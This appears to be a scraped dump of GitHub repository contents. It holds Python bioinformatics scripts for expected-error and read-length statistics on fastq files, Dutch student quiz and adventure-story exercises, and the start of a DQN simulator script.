file\"\n\t)\n\t\n\tparser.add_argument(\n\t\t\"-v\",\n\t\t\"--verbose\",\n\t\taction = 'store_true',\n\t\thelp = \"Print status updates while executing.\"\n\t)\n\treturn parser.parse_args()\n\ndef firstT(arr):\n\t\"\"\"Return index of first False. \n\t\"\"\"\n\timax = 0\n\tfor i, elem in enumerate(arr):\n\t\tif elem == True:\n\t\t\tcontinue\n\t\telse:\n\t\t\treturn i-1\n\t\timax = i\n\treturn imax\n\ndef threshold(data):\n\t\"\"\"Determine position where X%% sequences kept at set Emax.\n\t\"\"\"\n\toutput = {}\n\tfor k, v in data.iteritems():\n\t\toutput[k] = {}\n\t\tpercent_25 = data[k][\"percent\"] > 25.0\n\t\ti = firstT(percent_25)\n\t\toutput[k][\"25\"]=data[k][\"L\"][i]\n\t\tpercent_50 = data[k][\"percent\"] > 50.0\n\t\ti = firstT(percent_50)\n\t\toutput[k][\"50\"]=data[k][\"L\"][i]\n\t\tpercent_75 = data[k][\"percent\"] > 75.0\n\t\ti = firstT(percent_75)\n\t\toutput[k][\"75\"]=data[k][\"L\"][i]\n\treturn output\n\ndef summarize(data, args):\n\t\"\"\"Write summary of thresholds to file.\n\t\"\"\"\n\tcount = 0\n\theader = \"EE,Percent,L\\n\"\n\twith open(args.output, \"w\") as f:\n\t\tf.write(header)\n\t\tfor EE, value in data.iteritems():\n\t\t\tfor percent, L in value.iteritems():\n\t\t\t\trow = \"{},{},{}\\n\".format(\n\t\t\t\t\tEE,\n\t\t\t\t\tpercent,\n\t\t\t\t\tL\n\t\t\t\t)\n\t\t\t\tf.write(row)\n\t\t\t\tcount += 1\n\t\t\t\tif args.verbose:\n\t\t\t\t\tprint row,\n\treturn count\n\ndef main():\n\targs = getArgs()\n\tif args.verbose:\n\t\tprint args\n\n\t# input data\n\tdata = {}\n\twith open(args.input, \"rUb\") as f:\n\t\tcsv_reader = csv.reader(f, delimiter=\",\")\n\t\tfor i, row in enumerate(csv_reader):\n\t\t\tif i == 0:\n\t\t\t\tcontinue\n\t\t\tEmax, L, percent = row[0], row[1], float(row[3])\n\t\t\ttry:\n\t\t\t\tdata[Emax]\n\t\t\texcept KeyError:\n\t\t\t\tdata[Emax]={}\n\t\t\ttry:\n\t\t\t\tdata[Emax][\"L\"].append(L)\n\t\t\t\tdata[Emax][\"percent\"].append(percent)\n\t\t\texcept KeyError:\n\t\t\t\tdata[Emax][\"L\"] = [L]\n\t\t\t\tdata[Emax][\"percent\"] = [percent]\n\n\t# Convert to numpy arrays\n\tfor k, v in data.iteritems():\n\t\tdata[k][\"L\"] = np.array(data[k][\"L\"], dtype=int)\n\t\tdata[k][\"percent\"] = np.array(data[k][\"percent\"], dtype=float)\n\n\t# threshold\n\toutput = {}\n\toutput = threshold(data)\n\tsummarize(output, args)\n\n\nif __name__ == \"__main__\":\n\tmain()\n" }, { "alpha_fraction": 0.6340740919113159, "alphanum_fraction": 0.6414814591407776, "avg_line_length": 18.622093200683594, "blob_id": "d9d41d177c2a3e5779e35696e4d9534615615779", "content_id": "8a97dbbf8610f280a80e1c4327201ee5827c513f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3375, "license_type": "permissive", "max_line_length": 64, "num_lines": 172, "path": "/emax_stats.py", "repo_name": "jeffreywolf/expectedError", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\"\"\"\nE statistics summary\n\"\"\"\nfrom Bio import SeqIO\nimport re\nimport os\nimport glob\nimport argparse\nimport numpy as np\nimport ConfigParser\n\n\ndef getArgs():\n\tparser = argparse.ArgumentParser(\n\t\tdescription = \"E statistics summary.\"\n\t)\n\tparser.add_argument(\n\t\t\"-i\",\n\t\t\"--input\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Input file fastq\"\n\t)\n\n\tparser.add_argument(\n\t\t\"-c\",\n\t\t\"--config\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Configuration file.\"\n\t)\n\n\tparser.add_argument(\n\t\t\"-v\",\n\t\t\"--verbose\",\n\t\taction = 'store_true',\n\t\thelp = \"Print status updates while executing.\"\n\t)\n\n\tparser.add_argument(\n\t\t\"-o\",\n\t\t\"--output\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Output file\"\n\t)\n\treturn parser.parse_args()\n\ndef getConfigs(configFile):\n\ttry:\n\t\tconfigDict = {}\n\t\tconfig = ConfigParser.ConfigParser()\n\t\tconfig.read(configFile)\n\t\tParams= dict(config.items(\"Params\"))\n\t\tprint Params\n\t\temaxes = [float(emax) for emax in Params[\"emaxes\"].split(\",\")]\n\t\t#print emaxes\n\t\t#emaxes.sort().reverse()\n\t\treturn emaxes\n\texcept Exception as e:\n\t\tprint \"Problem parsing config file. Check config file.\"\n\t\traise e\n\ndef E_calc(S):\n\t\"\"\"Calculate E for a sequence based on phred quality scores.\n\t\"\"\"\n\tQs = S.letter_annotations[\"phred_quality\"]\n\tQs = np.array(Qs, dtype=np.float)\n\tPi = np.power(10.,-Qs/10.)\n\t# Note this will correctly return 0 for an empty array.\n\tE = np.sum(Pi) \n\treturn E\n\ndef E_test(E, Emax):\n\t\"\"\"Test if E is less than Emax.\n\t\"\"\"\n\treturn E <= Emax\n\ndef trim(S, L):\n\t\"\"\"Trim a sequence to a specified length.\n\t\"\"\"\n\treturn S[:L]\n\ndef L_filter(S, L):\n\t\"\"\"Test if a trim sequence S matches a length threshold L.\n\t\"\"\"\n\tif len(S.seq) == L:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef E_filter(S, Emax):\n\t\"\"\"Test if a E for a sequence S is less than Emax.\n\t\"\"\"\n\t#print S, Emax\n\t#print S.letter_annotations[\"phred_quality\"]\n\tE = E_calc(S)\n\tif E_test(E, Emax):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef summarize(data, total, args):\n\t\"\"\"Write the cumulative distributions for each emax to a file.\n\t\"\"\"\n\tcount = 0\n\theader = \"Emax,L,N,percent\\n\"\n\twith open(args.output, \"w\") as f:\n\t\tf.write(header)\n\t\tfor key, value in data.iteritems():\n\t\t\tfor k, v in value.iteritems():\n\t\t\t\trow = \"{},{},{},{}\\n\".format(\n\t\t\t\t\tkey,\n\t\t\t\t\tk,\n\t\t\t\t\tv,\n\t\t\t\t\tv/float(total)*100.0\n\t\t\t\t)\n\t\t\t\tif args.verbose:\n\t\t\t\t\tprint row,\n\t\t\t\tf.write(row)\n\t\t\t\tcount += 1\n\treturn count\n\ndef main():\n\targs = getArgs()\n\tif args.verbose:\n\t\tprint args\n\temaxes = getConfigs(args.config)\n\tif args.verbose:\n\t\tprint \"Emaxes: {}\".format(emaxes)\n\n\t# Get maximum sequence length\n\tlength = 0\n\tlength_max = 0\n\ttotal_sequences = 0\n\tfor seq in SeqIO.parse(args.input, \"fastq\"):\n\t\ttotal_sequences += 1\n\t\tlength = len(seq.seq)\n\t\tif length > length_max:\n\t\t\tlength_max = length\n\tif args.verbose:\n\t\tprint \"Maximum length is {} bp.\".format(length_max)\n\t# Vector of lengths\t\n\tlengths = range(length_max+1)\n\tdel length\n\tdel length_max\n\n\t# Make Data Structure\n\tdata = {}\n\tfor E in emaxes:\n\t\tdata[E]={}\n\t\tfor length in lengths:\n\t\t\tdata[E][length]=0\n\n\tcount = 0\n\tfor seq in SeqIO.parse(args.input, \"fastq\"):\n\t\tcount += 1\n\t\tfor E in emaxes:\n\t\t\tfor length in lengths:\n\t\t\t\tS = trim(seq, length)\n\t\t\t\tif L_filter(S, length) and E_filter(S, E):\n\t\t\t\t\tdata[E][length]+=1\n\t\tif args.verbose:\n\t\t\tif count % 1000 == 0:\n\t\t\t\tprint \"At sequence number {}.\".format(count)\n\tsummarize(data, total_sequences, args)\n\n\n\nif __name__ == \"__main__\":\n\tmain()\n" }, { "alpha_fraction": 0.7118380069732666, "alphanum_fraction": 0.7379283308982849, "avg_line_length": 34.66666793823242, "blob_id": "ef91bc0f3f60c9f00b84b025cc5ef25218a65021", "content_id": "fff98b0b6353358d4143654d5f3d3f5af1373916", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2568, "license_type": "permissive", "max_line_length": 266, "num_lines": 72, "path": "/README.md", "repo_name": "jeffreywolf/expectedError", "src_encoding": "UTF-8", "text": "README \n======\n\nGeneral\n-------\nScripts to quantify properties of the expected error [1-3] and read length distribution for sequencing data in fastq format.\n\n### Expected Error\nUse `emax_stats.py` to summarize the proportion of reads that when trimmed to a maximum length L meet that length threshold and also have expected error (E) less than a specified Emax (maxee) threshold. Multiple Emax thresholds can be set in the file emax_stats.cfg.\n\nUse `emax_threshold.py` to summarize output from `emax_stats.py` resulting in a new summary with the trim length at an Emax threshold for obtaining 25%, 50%, and 75% of the reads.\n\n### Read Length Distribution\n`length_stats.py`\nSummarize the cumulative length distribution of sequences. \n\n\nInput\n-------------\n`emax_stats.py`\n\n1. A configuration file with a series of Emax values. See example emax_stats.cfg file.\n2. A sequence data file in fastq format.\n\n\n`emax_threshold.py`\n* Output from emax_stats.py\n\n`length_stats.py`\n* A sequence data file in fastq format.\n\n\nOutput\n-------------\n`emax_stats.py`\n* A csv file summarizing the cumulative distribution for percent of total reads passing specified Emax thresholds for all lengths spanning from zero to the maximum read length in the sequence data file.\n\n`emax_threshold.py`\n* A csv file containing the trim lengths that give 25%, 50%, or 75% of the total number of reads when applying a given Emax threshold.\n\n`length_stats.py`\n* A csv file containing the cumulative distribution of read lengths for a given input file.\n\n\nNon-standard library dependencies\n--------------\nBiopython, numpy\n\n\nExamples\n--------\nCall any of the programs with the -h flag for a brief list of commandline arguments. Note that `emax_stats.py` requires a configuration file. \n\nIf running on Unix-like system make sure the files are executable.\n`chmod u+x emax_stats.py`\n`chmod u+x length_stats.py`\n`chmod u+x emax_threshold.py`\n\nThen you can run the programs like so.\n\n`emax_stats.py -i input.fastq -c emax_stats.cfg -o emax_stats.csv -v`\n`length_stats.py -i input.fastq -o length_stats.csv -v`\n`emax_threshold.py -i emax_stats.csv -o emax_thresholds.csv -v`\n\n\nReferences\n----------\n[1] Edgar, R.C. (2013) UPARSE: Highly accurate OTU sequences from microbial amplicon reads. Nature Methods 10(10):996-998. <a href=\"http://dx.doi.org/10.1038/nmeth.2604\">dx.doi.org/10.1038/nmeth.2604</a>\n\n[2] Edgar, R.C. \"Expected Errors\". <http://drive5.com/usearch/manual/expected_errors.html> accessed Jan. 18, 2015\n\n[3] Edgar, R.C. \"Average Q score\". <http://drive5.com/usearch/manual/avgq.html> accessed Jan. 18, 2015\n" }, { "alpha_fraction": 0.6171597838401794, "alphanum_fraction": 0.6295858025550842, "avg_line_length": 17.172042846679688, "blob_id": "b19286b2be83c071fd09bd91b778f0ba4750b39d", "content_id": "29ff128715255e210a6b30a9713b1d76deb0a94c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1690, "license_type": "permissive", "max_line_length": 67, "num_lines": 93, "path": "/length_stats.py", "repo_name": "jeffreywolf/expectedError", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\"\"\"\nE statistics summary\n\"\"\"\nfrom Bio import SeqIO\nimport re\nimport os\nimport glob\nimport argparse\nimport numpy as np\n\n\ndef getArgs():\n\tparser = argparse.ArgumentParser(\n\t\tdescription = \"E statistics summary.\"\n\t)\n\tparser.add_argument(\n\t\t\"-i\",\n\t\t\"--input\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Input file fastq\"\n\t)\n\n\tparser.add_argument(\n\t\t\"-v\",\n\t\t\"--verbose\",\n\t\taction = 'store_true',\n\t\thelp = \"Print status updates while executing.\"\n\t)\n\n\tparser.add_argument(\n\t\t\"-o\",\n\t\t\"--output\",\n\t\ttype = str,\n\t\trequired = True,\n\t\thelp = \"Output file\"\n\t)\n\treturn parser.parse_args()\n\ndef summarize(data, filename):\n\t\"\"\"Write cumulative distribution of lengths to a file.\n\t\"\"\"\n\tcount = 0\n\theader = \"L,N,percent,CumulativeCount,CDF\\n\"\n\twith open(filename, \"w\") as f:\n\t\tf.write(header)\n\t\tfor i, elem in enumerate(data):\n\t\t\trow = \"{},{},{},{},{}\\n\".format(\n\t\t\t\ti,\n\t\t\t\telem,\n\t\t\t\telem/float(sum(data))*100.0,\n\t\t\t\tsum(data[i:]),\n\t\t\t\tsum(data[i:])/float(sum(data))*100\n\t\t\t)\n\t\t\tprint row,\n\t\t\tf.write(row)\n\t\t\tcount += 1\n\treturn count\n\ndef testCount(tally1, tally2):\n\tassert tally1 == tally2, \"Error: Sequence tally counts not equal.\"\n\ndef main():\n\targs = getArgs()\n\tif args.verbose:\n\t\tprint args\n\n\t# Maximum length\n\tm = 0\n\ttotal = 0\n\tfor seq in SeqIO.parse(args.input, \"fastq\"):\n\t\ttotal += 1\n\t\tN = len(seq.seq)\n\t\tif N > m:\n\t\t\tm = N\n\tif total == 0:\n\t\tprint \"Check sequence file. No sequences read.\"\n\t\treturn -1\n\t# Length Distribution\n\t# m + 1 to include possibility of zeros.\n\tdata = np.zeros(m+1, dtype=int)\n\tfor seq in SeqIO.parse(args.input, \"fastq\"):\n\t\tN = len(seq.seq)\n\t\tdata[N]+=1\n\n\t#testCount(total, sum(data))\n\tsummarize(data, args.output)\n\n\n\nif __name__ == \"__main__\":\n\tmain()\n" } ]
4
Damon-Jay/BO
https://github.com/Damon-Jay/BO
55fa9154097a2f35e1475faf5fda67ccf5a834f6
e6f6577fdc5d56dfb0540655f78cdf04d0ffa69d
6e153c4a2aa6552c59d0d0b89a4aacca0be33663
refs/heads/main
2023-01-05T04:44:10.525320
2020-10-29T23:03:16
2020-10-29T23:03:16
301,200,787
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6344085931777954, "alphanum_fraction": 0.6344085931777954, "avg_line_length": 22.5, "blob_id": "44e0acb2c7bb4e14f0cd23f3d1867bced337c982", "content_id": "0d742af79c47595576c25dd5c37c53897b6ceda0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "no_license", "max_line_length": 33, "num_lines": 4, "path": "/python opdrachten/HelloYouPython.py", "repo_name": "Damon-Jay/BO", "src_encoding": "UTF-8", "text": "print(\"Hello You, ik ben Damon Jellema\")\nprint(\"Wie ben jij?\")\nnaam = input()\nprint(\"Hello \" + naam)" }, { "alpha_fraction": 0.6336144208908081, "alphanum_fraction": 0.6681205630302429, "avg_line_length": 30.650306701660156, "blob_id": "b4be126e8d46fdf3bb22f3e610f482b1561f098c", "content_id": "45420830bcbbcbc3248623ca65c9c15a51cb9822", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10320, "license_type": "no_license", "max_line_length": 302, "num_lines": 326, "path": "/python opdrachten/Keuzeverhaal.py", "repo_name": "Damon-Jay/BO", "src_encoding": "UTF-8", "text": "import time\nimport os\n\nos.system(\"cls\")\n\nintro = 1;\nvraag1 = 0;\nantwoord1 = 0;\nvraag2 = 0;\nantwoord2 = 0;\nvraag3 = 0;\nantwoord3 = 0;\nvraag4 = 0;\nantwoord4 = 0;\nvraag5 = 0;\nantwoord5 = 0;\nvraag6 = 0;\nantwoord6 = 0;\nvraag7 = 0;\nantwoord7 = 0;\nvraag8 = 0;\nantwoord8 = 0;\nvraag9 = 0;\nantwoord9 = 0;\nvraag10 = 0;\nantwoord10 = 0;\nvraag11 = 0;\nantwoord11 = 0;\nvraag12 = 0;\nantwoord12 = 0;\nvraag13 = 0;\nantwoord13 = 0;\nvraag14 = 0;\nantwoord14 = 0;\nvraag15 = 0;\nantwoord15 = 0;\nvraag16 = 0;\nantwoord16 = 0;\nvraag17 = 0;\nantwoord17 = 0;\nvraag18 = 0;\nantwoord18 = 0;\nvraag19 = 0;\nantwoord19 = 0;\nvraag20 = 0;\nantwoord20 = 0;\nvraag21 = 0;\nantwoord21 = 0;\nvraag22 = 0;\nantwoord22 = 0;\nvraag23 = 0;\nantwoord23 = 0;\nvraag24 = 0;\nantwoord24 = 0;\nvraag25 = 0;\nantwoord25 = 0;\n\nwhile intro == 1:\n print(\"Je woont in een arm dorpje samen met je Oma, Vader, Moeder en je twee Zussen.\" + '\\n' + \"Op een dag krijgen jullie het nieuws dat er extremisten naar jullie dorp komen.\" + '\\n' + \"het is heel onveilig\")\n vraag1 = 1;\n intro = 0;\n break\n\nwhile vraag1 == 1:\n print(\"Ga je vluchten of niet\")\n antwoord1 = input(\"A - Wel of B - Niet : \").upper()\n break\n\nwhile antwoord1 == 'A':\n vraag2 = 1; \n break\n\nwhile antwoord1 == 'B':\n vraag3 = 1;\n break\n\nwhile vraag3 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jij en je familie kiezen ervoor om te blijven in jullie dorp. de volgende dag horen jullie schoten. jullie kijken naar buiten en ziet rook in de verte.\" + \"jullie kiezen ervoor om te vluchten. Jullie pakken spullen om te overleven.\")\n antwoord3 = input(\"A - jullie gaat op jullie ezels met spullen er vandoor of B - jullie gaat met een kar met jullie spullen weg : \").upper()\n break\n \nwhile antwoord3 == 'B': \n print('\\n'\"Jullie vluchte met de kar maar ze zagen jullie dus jullie werden neergeschoten\") \n break\n\nwhile antwoord3 == 'A':\n vraag2 = 1;\n break\n \nwhile vraag2 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie vertrekken met jullie ezels richting het noord westen. ze spotten jullie gelukig niet. jullie zijn al 5 uur onderweg.\")\n antwoord2 = input(\"A - Jullie gaan gewoon door of B - jullie gaan even stoppen om te eten en drinken of B : \").upper()\n break\n\nwhile antwoord2 == 'B': \n vraag5 = 1; \n break\n\nwhile antwoord2 == 'A':\n vraag6 = 1;\n break\n\n\nwhile vraag6 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie stoppen niet en gaan gewoon door. na een tijdje zakken jullie ezels in omdat ze honger en dorst hebben.\")\n antwoord6 = input(\"A - jullie gaan stoppen, eten en drinken, de ezels drinken te geven maar geen eten of B - jullie gaan stoppen, eten en drinken, en de ezels krijgen eten en drinken : \").upper()\n break\n\nwhile antwoord6 == 'B': \n vraag5 = 1; \n break\n\nwhile antwoord6 == 'A':\n vraag7 = 1;\n break\n\nwhile vraag7 == 1:\n os.system(\"cls\")\n print('\\n' + \"het is heel laat jullie zijn moe.\")\n antwoord7 = input(\"A - jullie gaan slapen of B - jullie gaan gewoon door : \").upper()\n break\n\nwhile antwoord7 == 'A': \n print('\\n'\"Jullie gingen slapen. later op de avond werden jullie gespot door de extemisten en werden jullie vermoord\") \n break\n\nwhile antwoord7 == 'B':\n vraag9 = 1;\n break\n\nwhile vraag5 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie hebben gegeten en gedronken. Ook hebben jullie de ezels eten en drinkengegeven. jullie zien twee paden een gaat naar links en een gaat naar rechts.\")\n antwoord5 = input(\"A - jullie gaan naar links of B - jullie gaan naar rechts : \").upper()\n break\n\nwhile antwoord5 == 'B': \n vraag8 = 1; \n break\n\nwhile antwoord5 == 'A':\n vraag9 = 1;\n break\n\nwhile vraag8 == 1:\n os.system(\"cls\")\n print('\\n' + \"jullie gingen naar rechts. het pad kwam uit in een dichtgegroeid bos.\")\n antwoord8 = input(\"A - gaan jullie terug en nemen het andere pad of B - gaan jullie er doorheen : \").upper()\n break\n\nwhile antwoord8 == 'B': \n vraag12 = 1; \n break\n\nwhile antwoord8 == 'A':\n vraag9 = 1;\n break \n\nwhile vraag9 == 1:\n os.system(\"cls\")\n print('\\n' + \"Het pad wat jullie namen leed naar de stad Istanboel. de ezels zijn zo uitgeput dat ze niet meer verder kunnen. dus jullie besloten om ze te vermoorden en het vlees voor later mee te nemen. in istanboel kwamen jullie een man tegen. die wilt jullie helpen door een onderdak te geven.\")\n antwoord9 = input(\"A -vertrouw je hem niet en ga weer verder of B - vertrouw je hem wel : \").upper()\n break\n\nwhile antwoord9 == 'A': \n vraag12 = 1; \n break\n\nwhile antwoord9 == 'B':\n vraag15 = 1;\n break\n\nwhile vraag12 == 1:\n os.system(\"cls\")\n print('\\n' + \"jullie gaan istanboel in jullie zien een paar smokkelaars. ook zie je man van daarstraks nog. naar wie ga je.\")\n antwoord12 = input(\"A - ga je naar de smokkelaars of B - of je gaat toch met de man mee : \").upper()\n break\n\nwhile antwoord12 == 'B': \n vraag13 = 1; \n break\n\nwhile antwoord12 == 'A':\n vraag14 = 1;\n break\n\nwhile vraag13 == 1:\n os.system(\"cls\")\n print('\\n' + \"de man zegt tegen de familie over dat die smokkelaars hun kan vervoeren. maar dat ze vandaag vertrekken. de man zij ook dat ze bij hem kunnen blijven voor een tijdje\")\n antwoord13 = input(\"A - ga je naar de smokkelaars of B - of blijft bij de man : \").upper()\n break\n\nwhile antwoord13 == 'B': \n vraag15 = 1; \n break\n\nwhile antwoord13 == 'A':\n vraag14 = 1;\n break\nwhile vraag14 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie zijn weg gegaan bij de boerderij. jullie zien de smokelaars. dus jullie lopen naar hun toe en vraagt of jullie mee mogen naar een ander land. de smokkelaars zeggen dat jullie mogen kiezen.\")\n antwoord14 = input(\"A - Via de britse smokkelaars of B - via de Bulgaarse smokkelaars : \").upper()\n break\n\nwhile antwoord14 == 'B': \n vraag19 = 1; \n break\n\nwhile antwoord14 == 'A':\n print('\\n'\"Jullie gingen met de britse smokkelaars mee naar Oekraïne. Daar zijn jullie afgedropt in een dorpje waar de mensen jullie verder gingen helpen om jullie leven weer te herbouwen\")\n break\n\nwhile vraag15 == 1:\n os.system(\"cls\")\n print('\\n' + \"hij brengt jullie naar zijn stal en hij geeft jullie eten en drinken. hij gaat samen met jullie eten.\")\n antwoord15 = input(\"A - vertellen jullie NIET de reden waarom jullie zijn gevlucht en vertrekken na het eten of B - vertellen jullie WEL de reden waarom jullie zijn gevlucht : \").upper()\n break\n\nwhile antwoord15 == 'B': \n vraag16 = 1; \n break\n\nwhile antwoord15 == 'A':\n vraag14 = 1;\n break\n\nwhile vraag16 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie gaan slapen. Jij wordt wakker door gepraat. je hele familie ligt te slapen. Je hoord de man wat brabbelen. Je weet niet zeker wat je heb gehoord. wat doe je\")\n antwoord16 = input(\"A - Je vertelt tegen je familie dat we weg moeten gaan of B - je gaat weer door slapen : \").upper()\n break\n\nwhile antwoord16 == 'B': \n print('\\n'\"De man was aan de telefoon met een van de extremisten. de volgende dag werden jullie neergeschoten door de extremisten die jullie door de man heeft gevonden\")\n break\n\nwhile antwoord16 == 'A':\n vraag18 = 1;\n break\n\nwhile vraag18 == 1:\n os.system(\"cls\")\n print('\\n' + \"Je bent met je familie weg gegaan van de boerderij. maar waar gaan jullie naartoe\")\n antwoord18 = input(\"A - Gaan jullie de stad in of B - Het bos in : \").upper()\n break\n\nwhile antwoord18 == 'B': \n print('\\n'\"Je bent het bos in gegaan alleen de man kon dat zien. jullie zijn achtervolgd door de man en jullie zijn neergeschoten in het bos.\") \n break\n\nwhile antwoord18 == 'A':\n vraag19 = 1;\n break\n\nwhile vraag19 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie hebben besloten om met de bulgaarse smokkelaars mee te gaan. De smokkelaars vragen hoe ze vervoerd willen worden\")\n antwoord19 = input(\"A - Met de boot of B - Met een busje : \").upper()\n break\n\nwhile antwoord19 == 'B': \n vraag20 = 1;\n break\n\nwhile antwoord19 == 'A':\n vraag22 = 1;\n break\nwhile vraag19 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie hebben besloten om met de bulgaarse smokkelaars mee te gaan. De smokkelaars vragen hoe ze vervoerd willen worden\")\n antwoord19 = input(\"A - Met een busje naar de kust of B - Met een busje door landen heen : \").upper()\n break\n\nwhile antwoord19 == 'B': \n vraag20 = 1;\n break\n\nwhile antwoord19 == 'A':\n vraag22 = 1;\n break\n\nwhile vraag22 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie hebben besloten om naar de kust te gaan. De smokkelaars moeten verschillende kanten op\")\n antwoord22 = input(\"A - ga je met de boot of B - verde met het busje\").upper() \n break\n\nwhile antwoord22 == 'B': \n vraag20 = 1;\n break\n\nwhile antwoord22 == 'A':\n vraag23 = 1;\n break\n\nwhile vraag20 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie hebben besloten om verder te gaan met het busje.Jullie rijden met het busje naar italie. vanaf daar moesten jullie naar andere smokkelaars gaan die twee verschillede kanten op gaan.\")\n antwoord20 = input(\"A - ga je met de een auto naar Nederland of B - Ga je met de boot\").upper()\n break\n\nwhile antwoord20 == 'B': \n vraag23= 1;\n break\n\nwhile antwoord20 == 'A':\n print('\\n' + \"Jullie hebben besloten om naar Nederland te gaan. Jullie reden Naar nederland. toen jullie daar aankwamen werden jullie opgevangen. jullie vroegen een asielvergunning aan. jullie haalden de inburgeringstest en mochten daarom in Nederland blijven.\")\n break\n \nwhile vraag23 == 1:\n os.system(\"cls\")\n print('\\n' + \"Jullie hebben besloten om naar de kust te gaan en dan met de boot vervoerd te worden. alleen de smokkelaars moeten naar twee verschillende landen. met welke ga je mee\")\n antwoord23 = input(\"A - ga je naar Nederland of B - je gaat naar Tunesië: \").upper()\n break\n\nwhile antwoord23 == 'B': \n print('\\n' + \"Jullie hebben besloten om naar Tunesië te gaan. Jullie vaarde daar nartoe alleen de de golfen waren te hoog en jullie zijn daardoor verdronken\")\n break\n\nwhile antwoord23 == 'A':\n print('\\n' + \"Jullie hebben besloten om naar Nederland te gaan. Jullie vaarde succesvol Naar nederland. toen jullie daar aankwamen werden jullie opgevangen. jullie vroegen een asielvergunning aan. jullie haalden de inburgeringstest en mochten daarom in Nederland blijven.\")\n break" }, { "alpha_fraction": 0.5835492014884949, "alphanum_fraction": 0.5939119458198547, "avg_line_length": 29.215686798095703, "blob_id": "e1543eb3d259069ed98ac073e3f17815393b260c", "content_id": "2c36693f4873c897ec00b40efa95cea928b48fc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1544, "license_type": "no_license", "max_line_length": 91, "num_lines": 51, "path": "/python opdrachten/ditbenik.py", "repo_name": "Damon-Jay/BO", "src_encoding": "UTF-8", "text": "antwoord = \"\"\n\n\nprint(\"Hello You, ik ben Damon Jellema\")\nprint(\"Wie ben jij?\")\nnaam = input()\nprint('\\n')\nprint(\"Hello \" + naam)\nprint('\\n')\nprint(\"Ik ben een nieuwkomer op het mediacollege Amsterdam\")\nprint(\"Ik ga een aantal vragen stellen over mij zodat je me beter leert kennen.\")\nprint('\\n')\nprint(\"Op welke School zat ik voor het mediacollege?:\")\nprint(\"A. ClusiusCollege\")\nprint(\"B. KennemerCollege Beroepsgericht\")\nprint(\"C. De Marel\")\nantwoord = input().upper()\n\nif antwoord == 'B': \n print('\\n' + \"Goed\") \nelif antwoord == 'A': \n print('\\n' + \"Fout. Het goede antwoord is:\" + '\\n' + \"KennemerCollege Beroepsgericht\") \nelif antwoord == 'C':\n print('\\n' + \"Fout. Het goede antwoord is:\" + '\\n' + \"KennemerCollege Beroepsgericht\") \n\n\nprint('\\n' + \"Volgende vraag\" + '\\n' + \"Op welke vechtsport zit ik?:\")\nprint(\"1. Kickboxen\")\nprint(\"2. shotokan karate\")\nprint(\"3. Krav Maga\")\n\nantwoord = input()\nif antwoord == '3': \n print('\\n' + \"Goed\") \nelif antwoord == '1':\n print('\\n' + \"Fout. Het goede antwoord is:\" + '\\n' + \"Krav Maga\") \nelif antwoord == '2':\n print('\\n' + \"Fout. Het goede antwoord is:\" + '\\n' + \"Krav Maga\") \nprint('\\n' + \"Laatste vraag\" + '\\n' + \"Hoe oud ben ik?:\")\nprint(\"D. 15\")\nprint(\"E. 16\")\nprint(\"F. 18\")\n\nantwoord = input().upper()\nif antwoord == 'D': \n print('\\n' + \"Goed\") \nelif antwoord == 'E':\n print('\\n' + \"Fout. Het goede antwoord is:\" + '\\n' + \"15\") \nelif antwoord == 'F':\n print('\\n' + \"Fout. Het goede antwoord is:\" + '\\n' + \"15\") \nprint(\"Einde van de Quiz. Hopelijk weet je nu wat meer van mij.\") " } ]
3
witignite/Capstone-design
https://github.com/witignite/Capstone-design
db82b6b0be845c9eeb1bdda6c8120add7f79e1a0
1e4b054ae34addfb9823d51a604879704a8a0155
cae007fc9a7c2d09c33600bb9c364541102dbf85
refs/heads/master
2020-04-07T03:38:50.064327
2018-11-17T21:14:08
2018-11-17T21:14:08
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7828282713890076, "alphanum_fraction": 0.7979797720909119, "avg_line_length": 48.5, "blob_id": "254b7ccf118fb176d5a42f7e438732b74dce025c", "content_id": "88395e4e12a1c6bd9816116b411b4e1ab744231a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 198, "license_type": "no_license", "max_line_length": 100, "num_lines": 4, "path": "/README.md", "repo_name": "witignite/Capstone-design", "src_encoding": "UTF-8", "text": "# Copy from\n\n1. This file is copied/apdated from https://github.com/berkeleydeeprlcourse/homework/tree/master/hw3\n2. This file is copied/apdated from https://github.com/leeJaeDuck/dqn_learning_code\n" }, { "alpha_fraction": 0.4567258059978485, "alphanum_fraction": 0.47946035861968994, "avg_line_length": 45.12181091308594, "blob_id": "eae100725b139118d700fa1a7b1355ad067aa770", "content_id": "1db0f1e763ec83d6fe8011ecb4da7b6c1ad81d5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56112, "license_type": "no_license", "max_line_length": 212, "num_lines": 1215, "path": "/dqn_learning_code/simulator.py", "repo_name": "witignite/Capstone-design", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport cv2\nimport numpy as np\nimport yaml, sys, time, random\nimport math\n# import rospy, roslib, 